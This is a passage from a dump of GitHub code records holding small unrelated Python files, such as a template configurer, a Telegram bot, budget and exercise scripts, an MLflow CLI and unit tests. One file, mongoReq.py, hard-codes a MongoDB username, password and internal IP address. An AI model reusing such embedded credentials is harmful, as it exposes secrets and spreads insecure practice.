{} ...'.format(level, msg, suffix), file=out_file)\n\ndef quit(msg, *args):\n print_message('{}ERROR{}'.format(C_RED, C_), msg.format(*args), 'Quitting', sys.stderr)\n exit(1)\n\ndef warn(msg, *args):\n LOG_WARNINGS and print_message('{}WARNING{}'.format(C_YELLOW, C_), msg.format(*args), 'Skipping')\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-c', '--' + ARG_CONFIG_FILE, default='./theme_config.ini', help='config INI file used for template substitutions')\n parser.add_argument('-t', '--' + ARG_TEMPLATES_DIR, default='./templates/', help='directory containing templates to configure')\n parser.add_argument('-r', '--' + ARG_REFRESH_SCRIPT, help='refresh script to run after distributing templates to allow for changes to take effect')\n parser.add_argument('-q', '--quiet', action='store_true', help='suppress warnings (will still show errors)')\n args = parser.parse_args()\n global LOG_WARNINGS\n if args.quiet: LOG_WARNINGS = False\n return vars(args)\n\ndef load_config(filename):\n try:\n parser = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n return parser.read(filename) and parser\n except: return None\n\ndef get_template_files(templates_dirname):\n try: return map(lambda f: os.path.join(templates_dirname, f), os.listdir(templates_dirname))\n except: return None\n\ndef load_template(template_filename):\n try:\n with open(template_filename, 'r') as f:\n template_lines = f.readlines()\n if not template_lines: return (None, None)\n\n params = {}\n i = 0\n line = template_lines[i].strip()\n while not all(c == '-' for c in line):\n (param_name, param_data) = re.split('\\s*=\\s*', line)\n params[param_name] = param_data\n i += 1\n line = template_lines[i].strip()\n template = ''.join(template_lines[i+1:])\n return (template, params)\n except: return (None, None)\n\ndef required_params_present(params):\n REQUIRED_TEMPLATE_PARAMS = ['destination', 'executable']\n POSITIVES=['true', 'y', 'yes', '1']\n if not all(param_name in params for param_name in REQUIRED_TEMPLATE_PARAMS): return False\n\n params['executable'] = any(val == params['executable'].lower() for val in POSITIVES)\n return True\n\ndef replace_placeholders_with_data(template, data):\n try:\n return re.sub(r'{{(\\w*?):(\\w*?)}}', lambda m: data[m.group(1)][m.group(2)], template)\n except KeyError as e: return None\n\ndef make_file_executable(filename):\n try: os.chmod(filename, os.stat(filename).st_mode | stat.S_IEXEC)\n except: return None\n\ndef save_configured_resource(resource_str, destination, make_executable=False):\n destination = destination.replace('~', os.path.expanduser('~'))\n os.makedirs(os.path.dirname(destination), exist_ok=True)\n with open(destination, 'w') as fout:\n fout.write(resource_str)\n make_executable and make_file_executable(destination)\n\ndef refresh(refresh_script):\n try:\n refresh_script and subprocess.call(refresh_script)\n return True\n except: return None\n\ndef main():\n args = parse_arguments()\n\n theme_config = load_config(args[ARG_CONFIG_FILE])\n not theme_config and quit(\"Invalid config file '{}'\", args[ARG_CONFIG_FILE])\n\n template_files = get_template_files(args[ARG_TEMPLATES_DIR])\n not template_files and quit(\"Invalid templates dir '{}'\", args[ARG_TEMPLATES_DIR])\n\n for template_filename in template_files:\n (template, params) = load_template(template_filename)\n if template and required_params_present(params):\n themed_res = 
replace_placeholders_with_data(template, theme_config)\n if themed_res:\n save_configured_resource(themed_res, params['destination'], params['executable'])\n else: warn(\"Invalid placeholder found in template '{}'\", template_filename)\n else: warn(\"Invalid or malformed parameters in template '{}'\", template_filename)\n\n if args[ARG_REFRESH_SCRIPT]:\n not refresh(args[ARG_REFRESH_SCRIPT]) and warn(\"Failed to reload using script '{}'\", args[ARG_REFRESH_SCRIPT])\n else:\n warn(\"No reload script specified. Please reload any necessary changes manually\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"sshashank124/configurer","sub_path":"configurer.py","file_name":"configurer.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5606297048","text":"from pymongo import MongoClient\nimport re\n\n\ndef find(query):\n# uri = 'mongodb://logstash:depo2012@172.30.161.20:19332/'\n client = MongoClient('172.30.161.20', 19332)\n db = client['elk']\n db.authenticate('logstash', 'depo2012')\n data = db['data']\n res = data.find(query)\n return(res)\n\n\ndef preparResult(result, field_res):\n res = {}\n pattern = re.compile(\"\")\n for field in field_res:\n if field == \"\":\n res.update({\"\": result.count()})\n else:\n res.update({pattern.findall(field)[0]: []})\n\n for col in result:\n for field in field_res:\n try:\n if pattern.findall(field)[0] in col.keys():\n res[pattern.findall(field)[0]].append(col[pattern.findall(field)[0]])\n except IndexError:\n pass\n with open('exp.txt', 'a+') as f:\n f.write(str(res))\n return(res)\n\n\ndef resultMongo(query, result_final, field_res, in_chain, command):\n if command == 'find':\n result = find(query)\n result_dict = preparResult(result, field_res)\n result_final[int(in_chain)] = result_dict\n","repo_name":"etunko/elkSender","sub_path":"mailWorker/mongoReq.py","file_name":"mongoReq.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26961222394","text":"#!/usr/bin/python \n# coding:utf-8 \n\n\"\"\" \n@author: Yong Li \n@contact: liyong@cobotsys.com\n@software: PyCharm \n@file: basic_func.py \n@time: 18-8-7 下午7:19\n1. Cell phone图像与模板图像对齐\n2. 
清空文件夹下所有的文件\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport os\n# from skimage.measure import label, regionprops\n\nimport random\nimport shutil\n# import lmdb\nimport sys\n\n\n# ---获取路径下所有文件函数------------------------------------------------------------------------------------------------\ndef get_all_files(root):\n output = []\n for roots, dir, files in os.walk(root, followlinks=True):\n for short_name in files:\n output = output + [os.path.join(roots, short_name)[len(root) + 1:]]\n # for dir_name in dir:\n # output = output + get_all_files(os.path.join(roots, dir_name))\n return output\n\n\n# ---测试get_all_files函数-----------------------------------------------------------------------------------------------\ndef test_get_all_files():\n root = \"/media/yong/data/test/yong\"\n print(get_all_files(root))\n\n\n# 清空文件函数\ndef del_file(path):\n ls = os.listdir(path)\n for i in ls:\n c_path = os.path.join(path, i)\n if os.path.isdir(c_path):\n del_file(c_path)\n else:\n os.remove(c_path)\n\n\nif __name__ == \"__main__\":\n pass\n # test_image_correct()\n # test_get_all_files()\n","repo_name":"fx19940824/DetectionModel","sub_path":"TrainerDL/Projects/Mobile_Phone/ctools/basic_func.py","file_name":"basic_func.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"8868842000","text":"class Solution:\n def removeDuplicates(self, nums) -> int:\n #Approach 1: Time Complexity - O(N) and Space Complexity - O(1)\n if len(nums) == 0:\n return 0\n cnt = 0\n for i in range(1, len(nums)):\n if nums[i] != nums[cnt]:\n cnt += 1\n nums[cnt] = nums[i]\n return cnt + 1\n\n #Approach 2: Time Complexity - O(N) and Space Complexity - O(N)\n '''\n nums[:] = sorted(set(nums))\n return len(nums)\n '''\n\nif __name__ == \"__main__\":\n nums = [1,1,2]\n print(Solution().removeDuplicates(nums))\n print(nums)","repo_name":"VarunBhattacharya/LeetcodePythonSolutions","sub_path":"26_Remove_Duplicates_From_Sorted_Array.py","file_name":"26_Remove_Duplicates_From_Sorted_Array.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38699357622","text":"c_ans = input()\ns_ans = input()\n\nsum = 0\nif(len(c_ans) == len(s_ans)):\n for i in range(len(c_ans)):\n if(s_ans[i] == c_ans[i]):\n sum += 1\n print(sum)\nelse:\n print(\"Incomplete answer\")\n\n","repo_name":"KanakornMek/2190101-com-prog","sub_path":"04_Loop_03.py","file_name":"04_Loop_03.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14155404881","text":"#Initial code for setup in GitHub\n\nimport os\nimport csv\ncsvpath = os.path.join('budget_data.csv')\n# First column is (Date). Second column is (Profit/Losses)\n\ntotal_months = 0\nprev_revenue = 0\nmonth_of_change = []\nrevenue_change_list = []\ngreatest_increase = [\"\",0]\ngreatest_decrease = [\"\",999999999999]\ntotal_revenue = 0\n\nwith open(csvpath) as csvfile:\n csvreader = csv.DictReader(csvfile)\n \n for row in csvreader:\n\n #total months\n total_months = total_months + 1\n #total_revenue. The DictReader allows to read to column header from file. 
Found this a helpful to align with file/data\n total_revenue = total_revenue + int(row[\"Profit/Losses\"])\n \n #Calculate the revenue change\n revenue_change = int(row['Profit/Losses']) - prev_revenue\n prev_revenue = int(row['Profit/Losses'])\n revenue_change_list = revenue_change_list + [revenue_change]\n month_of_change = month_of_change + [row['Date']]\n\n #Calculate greatest increase\n if (revenue_change > greatest_increase[1]):\n greatest_increase[0] = row['Date']\n greatest_increase[1] = revenue_change\n \n #Calculate greatest decrease\n if (revenue_change < greatest_decrease[1]):\n greatest_decrease[0] = row['Date']\n greatest_decrease[1] = revenue_change\n\n#Calculate the average revenue change. Note that change list includes first line. To calculate total shown in module 3,\n#remove the first data row and alter the number of months. Another solution is to do If statement where month >1\n\n#revenue_avg = sum(revenue_change_list)/ len(revenue_change_list)\nrevenue_avg = (sum(revenue_change_list) - 1088983 ) / 85\n\n#Create output statement. Found this very helpful and easier to format than doing each individual print statements\noutput = (\n f\"\\nFinancial Analysis\\n\"\n f\"------------------------\\n\"\n f\"Total Months: {total_months}\\n\"\n f\"Total Revenue: ${total_revenue}\\n\"\n f\"Average Revenue Change: ${revenue_avg}\\n\"\n f\"Greatest Increase in Revenue: {greatest_increase[0]} (${greatest_increase[1]})\\n\"\n f\"Greatest Decrease in Revenue: {greatest_decrease[0]} (${greatest_decrease[1]})\\n\"\n)\n\nprint(output)\n\n#Print screen to see the revenue changes. \n#print(revenue_change_list)\n\n#Export results to text file\noutput_path = os.path.join(\"..\", \"Analysis\", \"financial_analysis.csv\")\nwith open(output_path, \"w\") as txt_file:\n txt_file.write(output)","repo_name":"jjmoreland/python-challenge","sub_path":"PyBank/Resources/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74042147939","text":"def isPalindrome(n):\n \n n = str(n)\n last = len(n) - 1\n \n for index in range(0, int(len(n) / 2)):\n if(n[index] != n[last - index]):\n return False\n \n return True\n\nmaxPalindrome = -1\n\nfor n1 in range(999, 99, -1):\n for n2 in range(999, 99, -1):\n n3 = n1 * n2\n if isPalindrome(n3):\n if n3 > maxPalindrome:\n maxPalindrome = n3\n\nprint(maxPalindrome)","repo_name":"AndiProg/ProjectEuler_Python","sub_path":"ProjectEuler_Python/0004.py","file_name":"0004.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36818649503","text":"# Exercise 2: Write a program to look for lines of the form:\n\n# New Revision: 39772\n# Extract the number from each of the lines using a regular expression and the findall() method. 
Compute the average of the numbers and print out the average as an integer.\n\n# Enter file:mbox.txt\n# 38549\n\n# Enter file:mbox-short.txt\n# 39756\n\nimport re\n\nuserInput = input('Enter file: ')\nfileHandle = open(userInput)\n\nlines = fileHandle.read()\nrevisions = re.findall('New Revision:\\s([0-9]+)', lines)\n\ntotal = 0\nfor revision in revisions:\n total = total + int(revision)\n\naverage = int(total/len(revisions))\n\nprint(average)","repo_name":"PeaWarrior/learn-py","sub_path":"ex_11/ex_11_02.py","file_name":"ex_11_02.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3178467106","text":"import turtle\r\nimport random\r\n\r\nwn = turtle.Screen() \r\ntmnt = turtle.Turtle()\r\ntmnt.shape(\"turtle\")\r\ncolours = [\"cyan\", \"purple\", \"white\", \"blue\"]\r\ntmnt.color(\"cyan\")\r\ntmnt.pensize(2)\r\nwn.bgcolor(\"grey\")\r\n\r\n\r\ntmnt.penup()\r\ntmnt.forward(90)\r\ntmnt.left(45)\r\ntmnt.pendown()\r\n\r\ndef branch():\r\n for i in range(3):\r\n for i in range(3):\r\n tmnt.forward(30)\r\n tmnt.backward(30)\r\n tmnt.right(45)\r\n tmnt.left(90)\r\n tmnt.backward(30)\r\n tmnt.left(45)\r\n tmnt.right(90)\r\n tmnt.forward(90)\r\n\r\nfor i in range(8):\r\n branch()\r\n tmnt.left(45)\r\n tmnt.color(random.choice(colours))\r\n\r\n#for i in range(20): #first snowflake\r\n #for i in range(2):\r\n #tmnt.forward(150)\r\n #tmnt.right(160)\r\n #tmnt.forward(100)\r\n #tmnt.left(140)\r\n #tmnt.forward(150)\r\n #tmnt.right(145)\r\n #tmnt.forward(25)\r\n #tmnt.left(120)\r\n #tmnt.forward(25)\r\n #tmnt.right(140)\r\n #tmnt.forward(150)\r\n #tmnt.right(32)\r\n #tmnt.color(random.choice(colours))\r\n\r\nwn.mainloop()\r\n","repo_name":"MerrimaT/cti110","sub_path":"P4LAB2c_Merriman.py","file_name":"P4LAB2c_Merriman.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37413205","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom PIL import Image, ImageOps\nimport numpy as np\n\ndef load_image(normalize=True, to_gray_scale=True):\n train_table = pd.read_table('./signate_画像10種類/train_master.tsv')\n \n# print(train_table.label_id)\n# print(train_table.file_name)\n x_train = []\n t_train = []\n x_test = []\n t_test = []\n counter = [0,0,0,0,0,0,0,0,0,0]\n print('loading...')\n for row in train_table.itertuples():\n img = Image.open('./signate_画像10種類/train_images/'+str(row.file_name))\n if to_gray_scale:\n img = ImageOps.grayscale(img)\n #画像を保存\n \n np_img = np.array(img, dtype=np.float32)\n flatten_image = np_img.flatten()\n# flatten_image /= 255\n \n #標準化 詳しくはこちらhttps://deepage.net/features/numpy-normalize.html\n if normalize:\n flatten_image = normalizer(flatten_image)\n \n \n counter[row.label_id] += 1\n \n if counter[row.label_id]%5 == 0:\n x_test.append(flatten_image)\n t_test.append(row.label_id)\n else:\n x_train.append(flatten_image)\n t_train.append([row.label_id])\n \n \n \n print('done.')\n \n x_test = np.array(x_test, dtype=np.float32)\n t_test = np.array(t_test, dtype=np.int)\n x_train = np.array(x_train, dtype=np.float32)\n t_train = np.array(t_train, dtype=np.int)\n \n return x_train, t_train, x_test, t_test\n\n#正規化\ndef normalizer(x, axis = None):\n xmean = x.mean(axis=axis, keepdims=True)\n xstd = np.std(x, axis=axis, keepdims=True)\n zscore = (x-xmean)/xstd\n return zscore\n\n#labelと文字列\ndef load_corr_table():\n \n label_table = 
pd.read_table('./signate_画像10種類/label_master.tsv')\n return label_table\n\nif __name__ == '__main__':\n x,t,a,b = load_image(normalize=True, to_gray_scale=True)\n","repo_name":"kichie/dnn-not-using-libraly","sub_path":"load_image.py","file_name":"load_image.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41297797967","text":"\"\"\"\nЗадача 1. Склады\nУ мебельного магазина есть два склада, на которых хранятся разные категории товаров по парам «название — количество»:\nsmall_storage = {\n 'гвозди': 5000,\n 'шурупы': 3040,\n 'саморезы': 2000\n}\n\nbig_storage = {\n 'доски': 1000,\n 'балки': 150,\n 'рейки': 600\n}\n\nМагазин решил сократить аренду и скинуть все товары в большой склад (big_storage).\nПосле этого нас попросили реализовать поиск по товарам.\nНапишите программу, которая объединяет оба словаря в один (в big_storage), затем запрашивает у пользователя название\nтовара и выводит на экран его количество. Если такого товара нет, то выводит об этом ошибку. Для получения значения используйте метод get.\n\nЗадача 2. Кризис фруктов\nМы работаем в одной небольшой торговой компании, где все данные о продажах фруктов за год сохранены в словаре\nв виде пар «название фрукта — доход»:\nincomes = {\n 'apple': 5600.20,\n 'orange': 3500.45,\n 'banana': 5000.00,\n 'bergamot': 3700.56,\n 'durian': 5987.23,\n 'grapefruit': 300.40,\n 'peach': 10000.50,\n 'pear': 1020.00,\n 'persimmon': 310.00,\n}\n\nВ компании наступил небольшой кризис, и нам поручено провести небольшой анализ дохода.\nНапишите программу, которая находит общий доход, затем выводит фрукт с минимальным доходом и удаляет его из словаря.\nВыведите итоговый словарь на экран.\nРезультат работы программы:\nОбщий доход за год составил 35419.34 рублей\nСамый маленький доход у grapefruit. Он составляет 300.4 рублей\nИтоговый словарь: {'apple': 5600.2, 'orange': 3500.45, 'banana': 5000.0, 'bergamot': 3700.56, 'durian': 5987.23,\n'peach': 10000.5, 'pear': 1020.0, 'persimmon': 310.0}\n\nЗадача 3. 
Гистограмма частоты\nЛингвистам нужно собрать данные о частоте букв в тексте, исходя из этих данных будет строиться гистограмма частоты букв.\nНап��шите программу, которая получает сам текст и считает, сколько раз в строке встречается каждый символ.\nНа экран нужно вывести содержимое в виде таблицы, отсортированное по алфавиту, а также максимальное значение частоты.\n\nПример:\nВведите текст: Здесь что-то написано\n : 2\n- : 1\nЗ : 1\nа : 2\nд : 1\nе : 1\nи : 1\nн : 2\nо : 3\nп : 1\nс : 2\nт : 2\nч : 1\nь : 1\nМаксимальная частота: 3\n\"\"\"\n\ntask = int(input('Выберите какую задачу выполнить (1, 2, 3): '))\n\nif task == 1:\n # Задача 1\n print('=' * 40)\n\n small_storage = {\n 'гвозди': 5000,\n 'шурупы': 3040,\n 'саморезы': 2000\n }\n\n big_storage = {\n 'доски': 1000,\n 'балки': 150,\n 'рейки': 600\n }\n\n for i_product in small_storage:\n if i_product in big_storage:\n big_storage[i_product] += small_storage[i_product]\n else:\n big_storage[i_product] = small_storage[i_product]\n\n product = input('Введите название товара: ')\n res = big_storage.get(product)\n if res != None:\n print('Количество на складе: ', res)\n else:\n print('Товара нет.')\n print(big_storage)\n\n\nelif task == 2:\n # Задача 2\n print('=' * 40)\n print('Задача 2')\n\n incomes = {\n 'apple': 5600.20,\n 'orange': 3500.45,\n 'banana': 5000.00,\n 'bergamot': 3700.56,\n 'durian': 5987.23,\n 'grapefruit': 300.40,\n 'peach': 10000.50,\n 'pear': 1020.00,\n 'persimmon': 310.00,\n }\n name = ''\n summ_price = sum(incomes.values())\n min_product = min(incomes.values())\n for i_name in incomes:\n if incomes[i_name] == min_product:\n name = i_name\n incomes.pop(name)\n print('Общий доход за год составил {} рублей'.format(summ_price))\n print('Самый маленький доход у {name}. Он составляет {price} рублей'.format(name=name, price=min_product))\n print('Итоговый словарь:', incomes)\n\n\nelif task == 3:\n # Задача 3\n print('=' * 40)\n print('Задача 3')\n\n\n simbol_dict = dict()\n text = input('Введите текст: ').lower()\n for simb in text:\n if simb in simbol_dict:\n simbol_dict[simb] += 1\n else:\n simbol_dict[simb] = 1\n\n for num in sorted(simbol_dict.keys()):\n print(num, ':', simbol_dict[num])\n print('Максимальная частота:', max(simbol_dict.values()))\n\n\nelse:\n print('Выберите задачу заново.')","repo_name":"ZinovkinIgor/-Skillbox","sub_path":"Модуль 19/Практика/lesson 19.2.py","file_name":"lesson 19.2.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70867134182","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#@time: 2020/6/16 8:49\n\nimport traceback\nimport logging\n\n#定义日志格式\nlogging.basicConfig(\n filename='app2.log', #日志文件名,会在当前目录生成这个文件\n datefmt='%Y-%m-%d %H:%M:%S', #时间\n level=0, #日志级别 大于等于这个值,才会输出 #如果是40,就知会输出critical和error\n # 这个level不写,默认是30\n format='%(asctime)s-%(name)s-%(levelname)s-%(module)s-%(message)s' #日志格式\n #2020-06-16 08:14:13-root-ERROR-07日志处理-我是error\n #asctime 时间 #这里的格式是datefmt定义的\n #name root\n #levelname ERROR 日志级别\n #module 模块-文件名\n #message 提示信息\n)\n\n#关于日志级别\n# CRITICAL = 50\n# FATAL = CRITICAL\n# ERROR = 40\n# WARNING = 30\n# WARN = WARNING\n# INFO = 20\n# DEBUG = 10\n# NOTSET = 0\n\n#报错就写日志 #重点\nfor i in range(3):\n try:\n if i % 3 == 0:\n raise FileNotFoundError('文件没有找到哈')#主动抛出异常\n elif i % 3 == 1:\n raise FileExistsError()\n elif i % 3 == 2:\n raise StopIteration()\n except FileNotFoundError as e:\n val = traceback.format_exc() #记录报错的堆栈信息,错误在哪一行\n logging.error(val)\n except 
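The store-merging loop in task 1 above can also be expressed with collections.Counter, which sums counts for overlapping keys — a sketch with the same data:

from collections import Counter

big_storage = Counter({'доски': 1000, 'балки': 150, 'рейки': 600})
big_storage.update({'гвозди': 5000, 'шурупы': 3040, 'саморезы': 2000})
assert big_storage['гвозди'] == 5000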
FileExistsError as e:\n val = traceback.format_exc()\n logging.error(val)\n except StopIteration as e:\n val = traceback.format_exc()\n logging.error(val)\n except Exception as e:\n val = traceback.format_exc()\n logging.error(val)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cn5036518/xq_py","sub_path":"python16/day1-21/day020 约束和异常处理/07_2日志处理2.py","file_name":"07_2日志处理2.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1332481425","text":"from __future__ import print_function\nimport json\nimport telegram\nimport os\nimport logging\n\n# Logging is cool!\nlogger = logging.getLogger()\nif logger.handlers:\n for handler in logger.handlers:\n logger.removeHandler(handler)\nlogging.basicConfig(level=logging.INFO)\n\ndef configure_telegram():\n \"\"\"\n Configures the bot with a Telegram Token.\n Returns a bot instance.\n \"\"\"\n\n TELEGRAM_TOKEN = os.environ.get('TELEGRAM_TOKEN')\n if not TELEGRAM_TOKEN:\n logger.error('The TELEGRAM_TOKEN must be set')\n raise NotImplementedError\n\n return telegram.Bot(TELEGRAM_TOKEN)\n\ndef extract_values(obj, key):\n \"\"\"Pull all values of specified key from nested JSON.\"\"\"\n arr = []\n\n def extract(obj, arr, key):\n \"\"\"Recursively search for values of key in JSON tree.\"\"\"\n if isinstance(obj, dict):\n for k, v in obj.items():\n if isinstance(v, (dict, list)):\n extract(v, arr, key)\n elif k == key:\n arr.append(v)\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, key)\n return arr\n\n results = extract(obj, arr, key)\n return results\n\ndef lambda_handler(event, context):\n TELEGRAM_CHAT_ID = os.environ.get('TELEGRAM_CHAT_ID')\n bot = configure_telegram()\n for record in event['Records']:\n d = json.loads(record['body'])\n print(d['dynamodb']['Keys']['id']['S'])\n bot.send_message(text=d['dynamodb']['Keys']['id']['S'], chat_id=TELEGRAM_CHAT_ID)\n print('Successfully processed %s records.' % str(len(event['Records'])))\n return\n","repo_name":"kebabmane/serverless-telegram-rss","sub_path":"lambdas/publish_to_telegram/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21366657230","text":"import logging\nfrom typing import List, Optional\n\nimport typer\nfrom mlflow import __version__ as mlflow_version\n\nfrom mlflow_mlserver_docker.main import download_and_build\n\nfrom . 
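The repeated traceback.format_exc() plus logging.error pairs above can be collapsed: logging.exception logs at ERROR level and appends the active exception's traceback automatically. A minimal sketch:

import logging

try:
    raise FileNotFoundError("file not found")
except FileNotFoundError:
    logging.exception("caught an expected error")  # traceback is appended automatically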
import __version__\n\nlogging.basicConfig(level=logging.DEBUG)\n\napp = typer.Typer(\n help=\"Simple CLI tool that helps you package an MLflow model on an MLflow tacking server into a docker image capable of serving an mlserver-compliant inference webservice.\"\n)\n\n\n@app.command(help=\"Display the version\")\ndef version():\n \"\"\"Display the version information.\"\"\"\n print(\"mlflow-mlserver-docker: \", __version__)\n print(\"mlflow: \", mlflow_version)\n\n\n@app.command(help=\"Download model artifact and build into mlserver image\")\ndef build( # noqa: D103\n artifact_uri: str = typer.Argument( # noqa: B008\n ...,\n help=\"See https://www.mlflow.org/docs/latest/python_api/mlflow.artifacts.html for possible formats\",\n ),\n tag: Optional[List[str]] = typer.Option( # noqa: B008\n None,\n help=\"Tag the image (multiple values allowed!), otherwise no tag will be used\",\n ),\n log_level: str = typer.Option(\"INFO\"), # noqa: B008\n):\n logging.getLogger().setLevel(log_level)\n download_and_build(artifact_uri, tag)\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"dingobar/mlflow-mlserver-docker","sub_path":"mlflow_mlserver_docker/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"30792976754","text":"\"\"\"\nPredictcs a number\n\"\"\"\nimport cv2\nimport numpy as np\nfrom tensorflow.python.keras.models import load_model\nimport matplotlib.pyplot as plt\n\n\n\ndef predict(img):\n image = img.copy()\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # image = cv2.threshold(image, 140, 255, cv2.THRESH_BINARY)[1]\n image = cv2.resize(image, (28, 28))\n # display_image(image)\n image = image.astype('float32')\n image = image.reshape(1, 28, 28, 1)\n image /= 255\n\n # plt.imshow(image.reshape(28, 28), cmap='Greys')\n # plt.show()\n model = load_model('cnn.hdf5')\n pred = model.predict(image.reshape(1, 28, 28, 1), batch_size=1)\n\n print(\"Predicted Number: \", pred.argmax())\n\n # return pred.argmax()\n\npredict(cv2.imread('TestNumber.png'))\n","repo_name":"Joy2469/Deep-Learning-MNIST---Handwritten-Digit-Recognition","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"36018110757","text":"#!/usr/bin/env python3\n\nimport sys\nfrom loguru import logger\n\nsys.path.extend([\".\", \"..\", \"../..\"])\n\nfrom telegram import Update\nfrom telegram.ext import ApplicationBuilder, CommandHandler, ContextTypes\nimport settings\n\nfrom data.redis_db import RedisDB, SearchRequest\n\nindex = RedisDB()\n\nif index is not None and index.create_db():\n logger.info(\"Index database created for the first time.\")\n\n\nasync def search_memes(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"Search matching memes in the database and return the bot respons text.\"\"\"\n req = update.message.text.removeprefix(\"/search \")\n\n logger.info(f\"Looking for {req}\")\n msgs = index.search(SearchRequest(\n query=req,\n ))\n\n res = [m.post_link for m in msgs]\n\n await update.message.reply_text(f\"Hello {res}\")\n\n\n# async def index_memes(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n# \"\"\"Index a chat.\"\"\"\n# scraper = TelegramScraper(storage, index)\n# await scraper.scrape_messages(update.message.text)\n# await update.message.reply_text(f\"Hello {update.effective_user.first_name}\")\n\n\nasync 
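predict() above reloads cnn.hdf5 on every call; a sketch of loading the model once and reusing it, assuming the same 'cnn.hdf5' file exists alongside the script:

from functools import lru_cache
from tensorflow.python.keras.models import load_model

@lru_cache(maxsize=1)
def get_model(path="cnn.hdf5"):
    # first call loads from disk; later calls return the cached instance
    return load_model(path)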
def hello(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n await update.message.reply_text(f\"Hello {update.effective_user.first_name}\")\n\n\ndef main():\n app = ApplicationBuilder().token(settings.TG_BOT_TOKEN).build()\n app.add_handler(CommandHandler(\"hello\", hello))\n app.add_handler(CommandHandler(\"search\", search_memes))\n # app.add_handler(CommandHandler(\"index\", index_memes))\n app.run_polling()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yamp/memgrep","sub_path":"scripts/start_api.py","file_name":"start_api.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"113564500","text":"#!/usr/bin/env python3\n\n\"\"\"PY210_SP - mailroom part 4 unit tests\nauthor: Nick Miller\"\"\"\n\nimport os\nimport mailroom_pt4 as mail\nfrom pathlib import Path\n\ndonor_db = {\n \"Jeff Staple\": [20, 20],\n \"Takashi Murakami\": [10.50],\n \"Virgil Abloh\": [300, 40.33, 5.35],\n \"Jan Chipchase\": [1001.23, 400.87, 102]\n}\n\ntest_db = {\n \"Donor One\": [10, 10],\n \"Donor Two\": [0],\n \"Donor Three\": [10, 25.50]\n}\n\n\ndef test_letter_prep():\n expected = ['jeff', 40.0]\n assert mail.letter_prep(\"jeff staple\", donor_db) == expected\n expected2 = ['donor', 35.5]\n assert mail.letter_prep(\"donor three\", test_db) == expected2\n\n\ndef test_letter_format():\n assert mail.letter_format(\"bob\", 10) == ('\\n'.join(['', 'Dearest bob,', '',\n 'Thank you for your generous support!',\n 'We appreciate your donation(s), which total $10.00 to date!', '',\n 'Sincerest regards,',\n '',\n 'The Foundation']))\n\n\ndef test_thanks_all():\n mail.thanks_all(test_db)\n assert os.path.isfile(\"janchipchase.txt\") is True\n assert os.path.isfile(\"jeffstaple.txt\") is True\n assert os.path.isfile(\"takashimurakami.txt\") is True\n\n\ndef test_save_file():\n mail.save_file(\"test.txt\", \"blah, blah\")\n assert os.path.isfile(\"test.txt\") is True\n expected = \"blah, blah\"\n assert Path('test.txt').read_text() == expected\n\n\ndef test_list_check():\n expected = \"jeff staple\"\n assert mail.list_check(\"jeff staple\", donor_db) == expected\n expected2 = \"not\"\n assert mail.list_check(\"donor four\", test_db) == expected2\n\n\ndef test_input_prep():\n test_str = \" HeLLo, HoW aRe YoU? \"\n expected = \"hello, how are you?\"\n assert mail.input_prep(test_str)\n\n\ndef test_input_check():\n expected = \"list\"\n assert mail.input_check(\"list\") == expected\n expected2 = \"y\"\n assert mail.input_check(\" Y\") == expected2\n\n\ndef test_db_update():\n expected = None\n assert mail.db_update(\"donor 